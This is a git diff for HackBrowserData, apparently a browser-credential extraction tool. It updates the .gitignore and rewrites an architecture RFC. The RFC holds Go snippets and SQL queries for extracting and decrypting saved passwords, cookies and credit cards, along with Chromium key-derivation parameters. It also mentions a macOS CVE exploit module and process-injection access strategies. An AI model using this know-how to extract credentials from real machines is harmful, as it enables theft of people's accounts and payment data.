diff --git a/.gitignore b/.gitignore index 0c4f246..7d73b9d 100644 --- a/.gitignore +++ b/.gitignore @@ -1,210 +1,49 @@ -# General -.DS_Store -.AppleDouble -.LSOverride +# Ignore everything by default (whitelist approach). +# This is critical for a security research tool — prevents +# accidental commit of browser data files (Cookies, Login Data, etc.) +* -# Icon must end with two \r -Icon +# Allow git to traverse directories +!*/ -# Thumbnails -._* +# === Source code === +!*.go +!go.mod +!go.sum -# Files that might appear in the root of a volume -.DocumentRevisions-V100 -.fseventsd -.Spotlight-V100 -.TemporaryItems -.Trashes -.VolumeIcon.icns -.com.apple.timemachine.donotpresent +# === Project root config === +!.gitignore +!.golangci.yml +!.goreleaser.yml +!.typos.toml +!CLAUDE.md +!LICENSE -# Directories potentially created on remote AFP share -.AppleDB -.AppleDesktop -Network Trash Folder -Temporary Items -.apdisk +# === Documentation === +!README.md +!CONTRIBUTING.md +!CODE_OF_CONDUCT.md +!LOGO.png +!CONTRIBUTORS.svg +# === GitHub === +!.github/workflows/*.yml +!.github/ISSUE_TEMPLATE/*.md +!.github/PULL_REQUEST_TEMPLATE.md +!.github/dependabot.yml +!.github/release-drafter.yml -# Byte-compiled / optimized / DLL files -__pycache__/ -*.py[cod] -*$py.class +# === RFCs === +!rfcs/*.md -# C extensions -*.so +# === Test fixtures === +!utils/chainbreaker/testdata/*.keychain-db -# Distribution / packaging -.Python -build/ -develop-eggs/ -dist/ -downloads/ -eggs/ -.eggs/ -lib64/ -parts/ -sdist/ -var/ -wheels/ -pip-wheel-metadata/ -share/python-wheels/ -*.egg-info/ -.installed.cfg -*.egg -MANIFEST - -# PyInstaller -# Usually these files are written by a python script from a template -# before PyInstaller builds the exe, so as to inject date/other infos into it. 
-*.manifest -*.spec - -# Installer logs -pip-log.txt -pip-delete-this-directory.txt - -# Unit test / coverage reports -htmlcov/ -.tox/ -.nox/ -.coverage -.coverage.* -.cache -nosetests.xml -coverage.xml -*.cover -*.py,cover -.hypothesis/ -.pytest_cache/ - -# Translations -*.mo -*.pot - -# Django stuff: -*.log -local_settings.py -db.sqlite3 -db.sqlite3-journal - -# Flask stuff: -instance/ -.webassets-cache - -# Scrapy stuff: -.scrapy - -# Sphinx documentation -docs/_build/ - -# PyBuilder -target/ - -# Jupyter Notebook -.ipynb_checkpoints - -# IPython -profile_default/ -ipython_config.py - -# pyenv -.python-version - -# pipenv -# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. -# However, in case of collaboration, if having platform-specific dependencies or dependencies -# having no cross-platform support, pipenv may install dependencies that don't work, or not -# install all needed dependencies. -#Pipfile.lock - -# PEP 582; used by e.g. github.com/David-OConnor/pyflow -__pypackages__/ - -# Celery stuff -celerybeat-schedule -celerybeat.pid - -# SageMath parsed files -*.sage.py - -# Environments -.env -.venv -env/ -venv/ -ENV/ -env.bak/ -venv.bak/ - -# Spyder project settings -.spyderproject -.spyproject - -# Rope project settings -.ropeproject - -# mkdocs documentation -/site - -# mypy -.mypy_cache/ -.dmypy.json -dmypy.json - -# Pyre type checker -.pyre/ - -# idea +# === Always ignore (override !*/) === +.git/ .idea/ -.idea - -# windows -*.exe -# macOS - -# binary -cmd/agent -cmd/server -# bin -# file -*.csv -*.xlsx -*.txt - -# config file -config.toml -*.json -Bookmarks -Login Data -Cookies -History -*.db -*.sqlite -*.sqlite-shm -*.sqlite-wal - -#Chromium* -#Firefox* +.vscode/ +vendor/ result/ results/ - -hack-browser-data -!/cmd/hack-browser-data -!/browserdata/history -!/browserdata/history/history.go -!/browserdata/history/history_test.go - -# github action -!/.github/workflows/unittest.yml 
-!/.github/ISSUE_TEMPLATE/*.md -!/.github/*.md - -# Community -!CONTRIBUTING.md - -# CICD Config -!.typos.toml -!.github/*.yml -!log/ -examples/*.go \ No newline at end of file +.DS_Store diff --git a/rfc/001-architecture-refactoring.md b/rfc/001-architecture-refactoring.md deleted file mode 100644 index 36b4fa2..0000000 --- a/rfc/001-architecture-refactoring.md +++ /dev/null @@ -1,241 +0,0 @@ -# RFC-001: HackBrowserData Architecture Refactoring - -**Author**: moonD4rk -**Status**: Proposed -**Created**: 2025-09-01 -**Updated**: 2025-09-01 - -## Abstract - -This RFC analyzes the current architectural issues in the HackBrowserData project and proposes refactoring directions. The core goal of the refactoring is to establish a modular, extensible, and testable architecture while supporting usage as a library that can be imported by other projects. - -## Current Issues Analysis - -### 1. Limited Encryption Version Support - -**Current State**: -- Only supports Chrome v10 (Chrome 80+) AES-GCM encryption format -- Hardcoded "v10" prefix handling logic in the code -- Lacks version detection and dynamic selection mechanism - -**Impact**: -- Unable to support data extraction from older browser versions -- Cannot adapt to future browser encryption algorithm upgrades (e.g., v11, v20) -- Chrome is introducing new encryption mechanisms (e.g., App-Bound Encryption in Chrome 127+), which the current architecture struggles to extend - -### 2. 
Scattered Cross-Platform MasterKey Retrieval - -**Current State**: -- Windows: Decrypts encrypted_key from Local State via DPAPI -- macOS: Accesses Keychain through security command, derives key using PBKDF2 -- Linux: Accesses Secret Service via D-Bus or uses hardcoded "peanuts" salt - -**Issues**: -- Each platform implementation is completely independent without a unified interface -- Difficult to add new key retrieval methods -- Code duplication and maintenance challenges -- Chrome on Windows is updating retrieval methods, requiring support for multiple strategies - -### 3. Windows Cookie File Access Permission Issues - -**Specific Issues**: -- On Windows, browsers lock Cookie files during runtime -- Direct reading may encounter "The process cannot access the file" errors -- Some security software blocks access to Cookie files - -**Current Approach Limitations**: -- Simple file copying may fail due to file locking -- Lacks alternative access strategies (e.g., shadow copy, process injection) -- No abstraction for permission elevation or bypass mechanisms - -### 4. Coupled Code Architecture - -**Problems**: -- CLI logic mixed with core functionality -- Data extraction, decryption, and output are tightly coupled -- Uses global variables and functions, difficult to use as a library - -**Specific Impact**: -- Cannot use core functionality independently -- Difficult to unit test -- Code reuse challenges - -### 5. Inconsistent Error Handling - -**Current State**: -- Some functions return errors, others directly use logging -- Error messages lack context (which browser, data type, platform) -- Cannot distinguish error severity (ignorable vs. fatal errors) - -**Impact**: -- Debugging difficulties with insufficient error information -- Cannot implement flexible error handling strategies -- Inconsistent user experience - -### 6. 
Testing and Maintenance Difficulties - -**Issues**: -- Depends on real file system and browser installations -- Cannot mock system calls and external dependencies -- Low test coverage -- Adding new features requires modifying multiple code locations - -## Architecture Improvement Proposals - -### 1. Versioned Encryption Strategies - -**Design Approach**: -- Create encryption version interface where each version implements its own detection and decryption logic -- Use registration mechanism to manage all supported versions -- Support both automatic detection and manual version specification - -**Key Capabilities**: -- Version Detection: Automatically identify encryption version through data characteristics -- Version Registration: Dynamically register new encryption version implementations -- Priority Control: Try different versions by priority - -### 2. Unified MasterKey Retrieval Abstraction - -**Design Approach**: -- Define cross-platform MasterKey retrieval interface -- Each platform can have multiple retrieval strategies -- Support strategy chain, trying different methods sequentially - -**Windows Strategy Examples**: -- DPAPI Strategy (traditional method) -- App-Bound Strategy (Chrome 127+) -- Cloud Sync Strategy (potential future) - -**Key Capabilities**: -- Platform detection and automatic selection -- Strategy priority and fallback mechanisms -- Error handling and logging - -### 3. File Access Abstraction Layer - -**Design Approach**: -- Create file access interface encapsulating different access strategies -- For Windows Cookie issues, implement multiple access methods -- Provide unified error handling and retry mechanisms - -**Windows Cookie Access Strategies**: -- Direct Copy (current method) -- Volume Shadow Copy Service (VSS) -- Memory Reading (from browser process) -- Stream Reading (bypass exclusive locks) - -### 4. 
Layered Package Structure - -**Design Principles**: -- Separate public API from internal implementation -- Separate interface definitions from concrete implementations -- Isolate platform-specific code - -**Package Structure Plan**: -``` -pkg/ # Public API (externally importable) -├── browser/ # Browser interface definitions -├── crypto/ # Encryption interface definitions -└── extractor/ # Data extractor interface definitions - -internal/ # Internal implementation (not exposed) -├── browser/ # Browser implementations -├── crypto/ # Encryption algorithm implementations -└── platform/ # Platform-specific implementations -``` - -### 5. Improved Browser Interface - -**Design Goals**: -- Support dependency injection -- Configurable and extensible -- Easy to test - -**Core Methods**: -- Configuration settings (profile, crypto provider, etc.) -- Data extraction (support selecting data types) -- Capability queries (supported data types and platforms) - -### 6. Unified Error Handling - -**Design Approach**: -- Define structured error types -- Include rich context information -- Support error classification and handling strategies - -**Error Information Should Include**: -- Operation type -- Browser name -- Data type -- Platform information -- Severity level -- Original error - -### 7. Library API Design - -**Design Goals**: -- Provide clean client interface -- Support convenient methods for common use cases -- Allow advanced users to customize behavior - -**Use Cases**: -- Simple: One-click extraction of all browser data -- Advanced: Custom encryption versions, error handling, data filtering - -### 8. 
Testing Strategy - -**Improvement Directions**: -- Use interfaces instead of concrete implementations -- Support dependency injection -- Provide mock implementations - -**Test Types**: -- Unit tests: Test independent components -- Integration tests: Test component interactions -- Platform tests: Test platform-specific functionality - -## Implementation Recommendations - -### Priority Levels - -1. **High Priority**: - - Versioned encryption strategies (solve version support issues) - - MasterKey retrieval abstraction (unify cross-platform implementations) - - Windows Cookie access issues (solve permission problems) - -2. **Medium Priority**: - - Browser interface refactoring - - Unified error handling - - Basic testing framework - -3. **Low Priority**: - - Complete library API - - Advanced feature extensions - - Performance optimizations - -### Compatibility Considerations - -- Keep CLI backward compatible, internally calling new architecture -- Provide migration documentation -- Gradually deprecate old APIs across versions - -## Security Considerations - -1. **Minimize Permissions**: Only request necessary system permissions -2. **Memory Safety**: Zero out sensitive data after use -3. **Error Messages**: Avoid leaking sensitive information -4. **Input Validation**: Strictly validate paths and data - -## Open Questions - -1. **File Access Strategy Selection**: How to automatically select the best file access strategy? -2. **Error Recovery**: How to gracefully recover and continue when encountering partial failures? -3. **Configuration Management**: Should configuration files be supported to control behavior? -4. **Plugin System**: Should user-defined data extractors be supported? 
- -## References - -- [Chromium OS Crypt](https://source.chromium.org/chromium/chromium/src/+/main:components/os_crypt/) -- [Chrome Password Decryption](https://github.com/chromium/chromium/blob/main/components/os_crypt/sync/os_crypt_win.cc) -- [Firefox NSS](https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS) -- [Windows File Locking](https://docs.microsoft.com/en-us/windows/win32/fileio/locking-and-unlocking-byte-ranges-in-files) \ No newline at end of file diff --git a/rfcs/001-architecture-refactoring.md b/rfcs/001-architecture-refactoring.md new file mode 100644 index 0000000..4b0711c --- /dev/null +++ b/rfcs/001-architecture-refactoring.md @@ -0,0 +1,798 @@ +# RFC-001: Architecture Refactoring + +**Author**: moonD4rk +**Status**: Proposed +**Created**: 2025-09-01 +**Updated**: 2026-03-22 + +## Abstract + +This RFC addresses the overall architecture of HackBrowserData: + +1. **Data model redesign**: `Category` enum + browser-agnostic `*Entry` structs +2. **Crypto layer**: cipher version detection, master key retrieval abstraction +3. **Browser registration & discovery**: declarative config, direct profile scanning +4. **Yandex variant handling**: source overrides + query overrides +5. **Error handling**: collect-and-continue pattern + +**Constraint**: Go 1.20 (Windows 7 support). + +See RFC-002 for file acquisition, extract method details, and output. + +--- + +## 1. 
Target Directory Structure + +``` +hackbrowserdata/ +├── cmd/ +│ └── hack-browser-data/ +│ └── main.go # CLI: flag parsing → PickBrowsers → Extract → Output +│ +├── browser/ +│ ├── browser.go # Browser interface, BrowserKind, Config, PickBrowsers() +│ ├── browser_darwin.go # platformBrowsers() → []Config +│ ├── browser_windows.go # platformBrowsers() → []Config +│ ├── browser_linux.go # platformBrowsers() → []Config +│ │ +│ ├── chromium/ +│ │ ├── chromium.go # Chromium struct (holds masterKey []byte), Extract() +│ │ ├── chromium_darwin.go # platform key retriever wiring +│ │ ├── chromium_windows.go # platform key retriever wiring +│ │ ├── chromium_linux.go # platform key retriever wiring +│ │ ├── source.go # chromiumSources, yandexSources maps +│ │ ├── extract_password.go # extractPasswords() + default SQL query +│ │ ├── extract_cookie.go # extractCookies() + default SQL query +│ │ ├── extract_history.go # extractHistories() + default SQL query +│ │ ├── extract_download.go # extractDownloads() + default SQL query +│ │ ├── extract_bookmark.go # extractBookmarks() (JSON) +│ │ ├── extract_creditcard.go # extractCreditCards() + default SQL query +│ │ ├── extract_extension.go # extractExtensions() (JSON) +│ │ └── extract_storage.go # extractLocalStorage(), extractSessionStorage() (LevelDB) +│ │ +│ ├── firefox/ +│ │ ├── firefox.go # Firefox struct, Extract(), deriveMasterKey() +│ │ ├── firefox_test.go +│ │ ├── source.go # firefoxSources map +│ │ ├── extract_password.go # extractPasswords() (JSON + ASN1PBE) +│ │ ├── extract_cookie.go # extractCookies() (SQLite, no encryption) +│ │ ├── extract_history.go # extractHistories() (SQLite) +│ │ ├── extract_download.go # extractDownloads() (SQLite) +│ │ ├── extract_bookmark.go # extractBookmarks() (SQLite) +│ │ ├── extract_extension.go # extractExtensions() (JSON) +│ │ └── extract_storage.go # extractLocalStorage() (SQLite) +│ │ +│ └── exploit/ +│ └── gcoredump/ +│ └── gcoredump.go # CVE-2025-24204 macOS exploit (darwin only) +│ 
+├── browserdata/
+│   ├── browserdata.go              # BrowserData struct (typed slices)
+│   ├── output.go                   # BrowserData.Output(): CSV/JSON writer
+│   ├── output_test.go
+│   │
+│   └── datautil/
+│       ├── sqlite.go               # QuerySQLite() helper
+│       ├── query.go                # QueryRows[T]() generic helper (Go 1.20)
+│       └── decrypt.go              # DecryptChromiumValue() helper
+│
+├── crypto/
+│   ├── crypto.go                   # AESCBCDecrypt, AESGCMDecrypt, DES3, PKCS5
+│   ├── crypto_darwin.go            # DecryptWithChromium (CBC), DecryptWithDPAPI (returns error)
+│   ├── crypto_windows.go           # DecryptWithChromium (GCM), DecryptWithDPAPI
+│   ├── crypto_linux.go             # DecryptWithChromium (CBC), DecryptWithDPAPI (returns error)
+│   ├── crypto_test.go
+│   ├── version.go                  # DetectVersion(), StripPrefix(), CipherVersion
+│   ├── asn1pbe.go                  # Firefox ASN.1 PBE key derivation
+│   ├── asn1pbe_test.go
+│   ├── pbkdf2.go
+│   │
+│   └── keyretriever/
+│       ├── keyretriever.go         # KeyRetriever interface, ChainRetriever
+│       ├── keyretriever_darwin.go  # GcoredumpRetriever, SecurityCmdRetriever
+│       ├── keyretriever_windows.go # DPAPIRetriever
+│       ├── keyretriever_linux.go   # DBusRetriever, FallbackRetriever
+│       └── params.go               # PBKDF2Params (saltysalt, iterations)
+│
+├── filemanager/
+│   └── session.go                  # Session: MkdirTemp, TempDir(), Acquire(), Cleanup()
+│
+├── types/
+│   ├── category.go                 # Category enum (9 values)
+│   ├── models.go                   # LoginEntry, CookieEntry, ... (browser-agnostic)
+│   └── types_test.go
+│
+├── log/
+│   ├── log.go
+│   ├── logger.go
+│   ├── logger_test.go
+│   └── level.go                    # log levels (merged from level/ sub-package)
+│
+└── utils/
+    ├── byteutil/
+    │   └── byteutil.go
+    ├── fileutil/
+    │   ├── fileutil.go             # renamed from filetutil.go
+    │   └── fileutil_test.go
+    ├── typeutil/
+    │   ├── typeutil.go
+    │   └── typeutil_test.go
+    └── chainbreaker/
+        ├── chainbreaker.go
+        └── chainbreaker_test.go
+```
+
+### What changed vs current structure
+
+| Change | Current | Target |
+|--------|---------|--------|
+| **New** `browserdata/datautil/` | (none) | SQLite + decrypt helpers |
+| **New** `filemanager/` | (none) | Session-based temp file management |
+| **New** `crypto/keyretriever/` | (none) | Master key retrieval abstraction |
+| **New** `crypto/version.go` | (none) | Cipher version detection |
+| **New** `browser/chromium/extract_*.go` | (none) | Per-category extract methods |
+| **New** `browser/firefox/extract_*.go` | (none) | Per-category extract methods |
+| **New** `browser/*/source.go` | (none) | File source mapping per engine |
+| **Restructured** `types/` | 22 DataType constants + file mappings | 9 Category constants + data model structs |
+| **Deleted** `extractor/` | interface + registry + factory | not needed |
+| **Deleted** `browserdata/imports.go` | init() side-effect registration | not needed |
+| **Deleted** `browserdata/password/`, `cookie/`, etc. | 9 sub-packages | extract logic moved into browser engines |
+| **Deleted** `browser/consts.go` | 27 scattered constants | inlined into Config |
+| **Renamed** `filetutil.go` | typo | `fileutil.go` |
+| **Renamed** `AES128CBCDecrypt` | misleading name | `AESCBCDecrypt` |
+
+### Naming conventions
+
+| Concept | Package | Type/Func | File |
+|---------|---------|-----------|------|
+| Data category | `types` | `Category` (int enum) | `category.go` |
+| Data models | `types` | `LoginEntry`, `CookieEntry`, ... | `models.go` |
+| Result container | `browserdata` | `BrowserData` | `browserdata.go` |
+| Browser config | `browser` | `Config` | `browser.go` |
+| Browser engine kind | `browser` | `BrowserKind` | `browser.go` |
+| File source mapping | `chromium`/`firefox` | `source` struct, `chromiumSources` map | `source.go` |
+| Key retrieval | `keyretriever` | `KeyRetriever` (interface) | `keyretriever.go` |
+| Strategy chain | `keyretriever` | `ChainRetriever` | `keyretriever.go` |
+| Cipher version | `crypto` | `CipherVersion` | `version.go` |
+| Temp file session | `filemanager` | `Session` | `session.go` |
+| SQLite helper | `datautil` | `QuerySQLite` (func) | `sqlite.go` |
+| Generic query helper | `datautil` | `QueryRows[T]` (func) | `query.go` |
+| Decrypt helper | `datautil` | `DecryptChromiumValue` (func) | `decrypt.go` |
+
+### Public vs private
+
+| Symbol | Exported | Reason |
+|--------|----------|--------|
+| `Browser` interface | Yes | used by cmd/main.go |
+| `Config` struct | Yes | passed to chromium.New() |
+| `PickBrowsers()` | Yes | called by cmd/main.go |
+| `platformBrowsers()` | No | browser package internal |
+| `isValidBrowserDir()` | No | browser package internal |
+| `Chromium.Extract()` | Yes | implements Browser interface |
+| `Chromium.extractPasswords()` | No | chromium package internal |
+| `Chromium.acquireFiles()` | No | chromium package internal |
+| `discoverProfiles()` | No | chromium package internal |
+| `BrowserData` struct | Yes | returned to cmd/main.go |
+| `BrowserData.Output()` | Yes | called by cmd/main.go |
+| `QuerySQLite()` | Yes | used by chromium and firefox |
+| `QueryRows[T]()` | Yes | used by chromium and firefox |
+
+### File naming convention for `extract_*.go`
+
+Files inside `browser/chromium/` and `browser/firefox/` use the `extract_` prefix for extraction logic.
This groups them visually when sorted alphabetically: + +``` +chromium.go ← struct + Extract orchestration +chromium_darwin.go ← platform: master key +chromium_linux.go +chromium_windows.go +extract_bookmark.go ← extract: one file per Category +extract_cookie.go +extract_creditcard.go +extract_download.go +extract_extension.go +extract_history.go +extract_password.go +extract_storage.go +source.go ← file source mapping +``` + +Three natural groups: `chromium*` (struct + platform), `extract_*` (data extraction), `source.go` (file mapping). Each `extract_*.go` file contains the default SQL query constant and the extract method (~20-30 lines). + +--- + +## 2. Core Data Model Redesign + +### 2.1 Problem: MasterKey mixed with data types + +The current `DataType` enum contains 22 constants that conflate three concerns: + +- **Infrastructure** (keys): `ChromiumKey`, `FirefoxKey4` +- **Browser engine prefix**: `ChromiumPassword` vs `FirefoxPassword` vs `YandexPassword` +- **File layout**: `Filename()`, `TempFilename()` methods on the enum + +A password is a password regardless of which browser it came from. The browser engine determines *how* to extract, not *what* the data is. + +### 2.2 New design: Category + Models + +**`types/category.go`** — 9 data categories (down from 22 DataType constants): + +```go +package types + +type Category int + +const ( + Password Category = iota + Cookie + Bookmark + History + Download + CreditCard + Extension + LocalStorage + SessionStorage +) + +var AllCategories = []Category{ + Password, Cookie, Bookmark, History, Download, + CreditCard, Extension, LocalStorage, SessionStorage, +} + +func (c Category) String() string { ... 
} + +func (c Category) IsSensitive() bool { + switch c { + case Password, Cookie, CreditCard: + return true + default: + return false + } +} + +func NonSensitiveCategories() []Category { + var cats []Category + for _, c := range AllCategories { + if !c.IsSensitive() { + cats = append(cats, c) + } + } + return cats +} +``` + +**`types/models.go`** — browser-agnostic data models, no encrypted fields: + +```go +package types + +import "time" + +type LoginEntry struct { + URL string `json:"url" csv:"url"` + Username string `json:"username" csv:"username"` + Password string `json:"password" csv:"password"` + CreatedAt time.Time `json:"created_at" csv:"created_at"` +} + +type CookieEntry struct { + Host string `json:"host" csv:"host"` + Path string `json:"path" csv:"path"` + Name string `json:"name" csv:"name"` + Value string `json:"value" csv:"value"` + IsSecure bool `json:"is_secure" csv:"is_secure"` + IsHTTPOnly bool `json:"is_httponly" csv:"is_httponly"` + ExpireAt time.Time `json:"expire_at" csv:"expire_at"` + CreatedAt time.Time `json:"created_at" csv:"created_at"` +} + +type BookmarkEntry struct { + Name string `json:"name" csv:"name"` + URL string `json:"url" csv:"url"` + Folder string `json:"folder" csv:"folder"` + CreatedAt time.Time `json:"created_at" csv:"created_at"` +} + +type HistoryEntry struct { + URL string `json:"url" csv:"url"` + Title string `json:"title" csv:"title"` + VisitCount int `json:"visit_count" csv:"visit_count"` + LastVisit time.Time `json:"last_visit" csv:"last_visit"` +} + +type DownloadEntry struct { + URL string `json:"url" csv:"url"` + TargetPath string `json:"target_path" csv:"target_path"` + TotalBytes int64 `json:"total_bytes" csv:"total_bytes"` + StartTime time.Time `json:"start_time" csv:"start_time"` + EndTime time.Time `json:"end_time" csv:"end_time"` +} + +type CreditCardEntry struct { + Name string `json:"name" csv:"name"` + Number string `json:"number" csv:"number"` + ExpMonth string `json:"exp_month" csv:"exp_month"` + 
ExpYear string `json:"exp_year" csv:"exp_year"` +} + +type StorageEntry struct { + URL string `json:"url" csv:"url"` + Key string `json:"key" csv:"key"` + Value string `json:"value" csv:"value"` +} + +type ExtensionEntry struct { + Name string `json:"name" csv:"name"` + ID string `json:"id" csv:"id"` + Description string `json:"description" csv:"description"` + Version string `json:"version" csv:"version"` +} +``` + +### 2.3 Result container + +**`browserdata/browserdata.go`**: + +```go +type BrowserData struct { + Passwords []types.LoginEntry + Cookies []types.CookieEntry + Bookmarks []types.BookmarkEntry + Histories []types.HistoryEntry + Downloads []types.DownloadEntry + CreditCards []types.CreditCardEntry + Extensions []types.ExtensionEntry + LocalStorage []types.StorageEntry + SessionStorage []types.StorageEntry +} +``` + +### 2.4 What was removed from types/ + +| Removed | Reason | +|---------|--------| +| `ChromiumKey`, `FirefoxKey4` | MasterKey is infrastructure, handled inside browser engine | +| `Chromium*`/`Firefox*`/`Yandex*` prefixes | Browser engine is extraction concern, not type concern | +| `Filename()`, `TempFilename()` | File layout is browser engine's internal knowledge | +| `itemFileNames` map | Moved into `chromium/source.go` and `firefox/source.go` | +| `DefaultChromiumTypes`, `DefaultFirefoxTypes`, `DefaultYandexTypes` | Replaced by `types.AllCategories` | +| `extractor/` package | No longer needed — browser engines have typed extract methods | +| `browserdata/imports.go` | No longer needed — no init() registration | + +--- + +## 3. 
Crypto Layer + +### 3.1 Cipher version detection + +**New file**: `crypto/version.go` + +```go +type CipherVersion string + +const ( + CipherV10 CipherVersion = "v10" // Chrome 80+ + CipherV20 CipherVersion = "v20" // Chrome 127+ App-Bound Encryption + CipherDPAPI CipherVersion = "dpapi" // pre-Chrome 80 +) + +func DetectVersion(ciphertext []byte) CipherVersion { + if len(ciphertext) < 3 { return CipherDPAPI } + prefix := string(ciphertext[:3]) + switch prefix { + case "v10": + return CipherV10 + case "v20": + return CipherV20 + default: + return CipherDPAPI + } +} + +func StripPrefix(ciphertext []byte) []byte { + ver := DetectVersion(ciphertext) + if ver == CipherV10 || ver == CipherV20 { + return ciphertext[3:] + } + return ciphertext +} +``` + +Version-specific post-processing (e.g., v20 cookie value has a 32-byte header) belongs here, not in extract methods: + +```go +// DecryptCookieValue handles version-specific cookie decryption. +func DecryptCookieValue(key, ciphertext []byte) ([]byte, error) { + version := DetectVersion(ciphertext) + payload := StripPrefix(ciphertext) + + switch version { + case CipherV10: + return decryptPayload(key, payload) + case CipherV20: + value, err := decryptPayload(key, payload) + if err != nil { return nil, err } + if len(value) > 32 { + return value[32:], nil // strip App-Bound header + } + return value, nil + default: + return nil, fmt.Errorf("unsupported cipher version: %s", version) + } +} +``` + +### 3.2 Key retriever abstraction + +**New package**: `crypto/keyretriever/` + +```go +type KeyRetriever interface { + RetrieveKey(storage string, localStatePath string) ([]byte, error) +} + +// Note: Windows DPAPIRetriever reads localStatePath to extract the encrypted key. +// macOS and Linux retrievers ignore localStatePath (they use keychain/dbus instead). + +type ChainRetriever struct { + retrievers []KeyRetriever +} + +func NewChain(retrievers ...KeyRetriever) KeyRetriever { ... 
} + +func (c *ChainRetriever) RetrieveKey(storage string, localStatePath string) ([]byte, error) { + var lastErr error + for _, r := range c.retrievers { + key, err := r.RetrieveKey(storage, localStatePath) + if err == nil && len(key) > 0 { return key, nil } + lastErr = err + } + return nil, fmt.Errorf("all key retrievers failed: %w", lastErr) +} +``` + +Platform defaults: +- macOS: `NewChain(&GcoredumpRetriever{}, &SecurityCmdRetriever{})` +- Windows: `&DPAPIRetriever{}` +- Linux: `NewChain(&DBusRetriever{}, &FallbackRetriever{})` + +**`params.go`** centralizes PBKDF2 magic values with source links: + +```go +var ( + // https://source.chromium.org/chromium/chromium/src/+/master:components/os_crypt/os_crypt_mac.mm + macOSParams = PBKDF2Params{Salt: []byte("saltysalt"), Iterations: 1003, KeyLen: 16} + // https://source.chromium.org/chromium/chromium/src/+/main:components/os_crypt/os_crypt_linux.cc + linuxParams = PBKDF2Params{Salt: []byte("saltysalt"), Iterations: 1, KeyLen: 16} +) +``` + +--- + +## 4. Browser Registration & Discovery + +### 4.1 Declarative browser config + +```go +// browser/browser.go +type BrowserKind int +const ( + KindChromium BrowserKind = iota + KindChromiumYandex // Chromium variant with different file names and SQL queries + KindFirefox +) + +type Config struct { + Key string // lookup key: "chrome", "firefox" + Name string // display name: "Chrome", "Firefox" + Kind BrowserKind + Storage string // keychain label (macOS/Linux); unused on Windows (DPAPI reads Local State directly) + UserDataDir string // e.g. ~/Library/Application Support/Google/Chrome/ +} + +type Browser interface { + Name() string + Extract(categories []types.Category) (*browserdata.BrowserData, error) +} +``` + +### 4.2 Platform browser list & PickBrowsers + +Each platform file defines `platformBrowsers()`. 
Spell out the full path on every line (no shared prefix variable):
+
+```go
+// browser/browser_darwin.go
+func platformBrowsers() []Config {
+	return []Config{
+		{Key: "chrome", Name: "Chrome", Kind: KindChromium, Storage: "Chrome",
+			UserDataDir: homeDir + "/Library/Application Support/Google/Chrome"},
+		{Key: "edge", Name: "Edge", Kind: KindChromium, Storage: "Microsoft Edge",
+			UserDataDir: homeDir + "/Library/Application Support/Microsoft Edge"},
+		// ... other browsers
+	}
+}
+```
+
+```go
+func PickBrowsers(name, profile string) ([]Browser, error) {
+	name = strings.ToLower(name)
+	var browsers []Browser
+	configs := platformBrowsers()
+	for _, cfg := range configs {
+		if name != "all" && cfg.Key != name { continue }
+		dir := cfg.UserDataDir
+		if profile != "" { dir = profile }
+		if !isValidBrowserDir(cfg.Kind, dir) {
+			continue
+		}
+		bs, err := newBrowserFromConfig(cfg, dir)
+		if err != nil {
+			log.Debugf("skip %s: %v", cfg.Name, err)
+			continue
+		}
+		browsers = append(browsers, bs...)
+	}
+	return browsers, nil
+}
+
+func newBrowserFromConfig(cfg Config, dir string) ([]Browser, error) {
+	switch cfg.Kind {
+	case KindChromium, KindChromiumYandex:
+		return chromium.New(cfg, dir)
+	case KindFirefox:
+		return firefox.New(dir)
+	default:
+		return nil, fmt.Errorf("unknown browser kind: %d", cfg.Kind)
+	}
+}
+```
+
+### 4.3 Browser installation validation & profile discovery
+
+Before enumerating profiles, confirm the directory is a real browser installation. For Chromium, the `Local State` file is the confirmation signal:
+
+```go
+func isValidBrowserDir(kind BrowserKind, dir string) bool {
+	if !fileutil.IsDirExists(dir) { return false }
+	switch kind {
+	case KindChromium, KindChromiumYandex:
+		return fileutil.IsFileExists(filepath.Join(dir, "Local State"))
+	case KindFirefox:
+		return true
+	}
+	return false
+}
+```
+
+Chromium profile directories follow a predictable naming scheme (`Default/`, `Profile 1/`, ...). Call `os.ReadDir()` directly and check known file paths instead of walking the whole tree with `filepath.Walk`.
+
+Firefox profiles are `xxxxxxxx.name/` directories. Enumerate them and check each for `key4.db` or `logins.json`.
+
+---
+
+## 5. Yandex Variant Handling
+
+Yandex is Chromium-based but differs in three places:
+
+| Aspect | Standard Chromium | Yandex |
+|--------|------------------|--------|
+| Password file | `Login Data` | `Ya Passman Data` |
+| Password SQL | `SELECT origin_url, ...` | `SELECT action_url, ...` |
+| CreditCard file | `Web Data` | `Ya Credit Cards` |
+
+### 5.1 Separate source map
+
+```go
+// browser/chromium/source.go
+
+var yandexSources = map[types.Category]source{
+	types.Password:       {paths: []string{"Ya Passman Data"}}, // different
+	types.Cookie:         {paths: []string{"Network/Cookies", "Cookies"}},
+	types.History:        {paths: []string{"History"}},
+	types.Download:       {paths: []string{"History"}},
+	types.Bookmark:       {paths: []string{"Bookmarks"}},
+	types.CreditCard:     {paths: []string{"Ya Credit Cards"}}, // different
+	types.Extension:      {paths: []string{"Secure Preferences"}},
+	types.LocalStorage:   {paths: []string{"Local Storage/leveldb"}, isDir: true},
+	types.SessionStorage: {paths: []string{"Session Storage"}, isDir: true},
+}
+```
+
+### 5.2 Query overrides (default + override pattern)
+
+Each extract method defines its own default SQL query constant. The Chromium struct holds an optional override map:
+
+```go
+// browser/chromium/chromium.go
+type Chromium struct {
+	name           string
+	profileDir     string
+	masterKey      []byte                    // retrieved once in New(), shared across profiles
+	sources        map[types.Category]source // chromiumSources or yandexSources
+	queryOverrides map[types.Category]string // nil for standard Chromium
+}
+
+var yandexQueryOverrides = map[types.Category]string{
+	types.Password: `SELECT action_url, username_value, password_value, date_created FROM logins`,
+}
+```
+
+Extract methods check for overrides locally:
+
+```go
+// browser/chromium/extract_password.go
+const defaultLoginQuery = `SELECT origin_url, username_value, password_value, date_created FROM logins`
+
+func (c *Chromium) extractPasswords(masterKey []byte, path string) ([]types.LoginEntry, error) {
+	query := defaultLoginQuery
+	if q, ok := c.queryOverrides[types.Password]; ok {
+		query = q
+	}
+	// ... rest of extraction
+}
+```
+
+### 5.3 Wiring at creation time
+
+```go
+func New(cfg browser.Config, userDataDir string) ([]*Chromium, error) {
+	sources := chromiumSources
+	var overrides map[types.Category]string
+	if cfg.Kind == browser.KindChromiumYandex {
+		sources = yandexSources
+		overrides = yandexQueryOverrides
+	}
+
